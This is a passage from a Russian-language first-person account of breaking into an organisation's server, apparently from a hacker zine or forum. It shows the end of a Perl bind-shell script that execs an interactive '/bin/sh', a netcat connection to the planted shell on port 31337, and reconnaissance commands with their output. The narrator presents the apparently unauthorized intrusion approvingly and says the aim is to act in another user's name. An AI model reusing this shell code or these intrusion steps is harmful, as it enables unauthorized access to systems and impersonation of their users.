open STDOUT,">&X";

open STDERR,">&X";

exec("/bin/sh -i");

close X;}}

Затем выполнил на своей машине:

[navy@Fortress /home/navy]# nc -vv cafedra.server.ru 31337

Fortress [127.0.0.1] 31337 (?) open

sh: no job control in this shell

Теперь у меня был shell на главном сервере конторы. Я не буду упоминать про попытки получить root-доступ из пользовательского. Целью было получить привилегии «особого» человека и от его имени продолжать дальнейшие действия.

Часть вторая: внутри

Немного остыв от радости, я решил ощупать объект:

sh-2.05# uname -a; id; pwd

Linux Debian 3.0 #1 Thu Sep 6 17:27:27 EDT 2001 i386 unknown

uid=1301(navy) gid=1301(navy) группы=1301(users)

/home/n/navy

sh-2.05# who

No one logged in.

sh-2.05# ps

  PID TTY          TIME CMD

 1376 tty1     00:00:00 login

 1466 tty1     00:00:00 bash

 2028 tty1     00:00:00 bs.pl

 2076 tty1     00:00:00 sh <defunct>

 2079 tty1     00:00:00 sh <defunct>

 2081 tty1     00:00:00 sh <defunct>

 4320 tty1     00:00:00 sh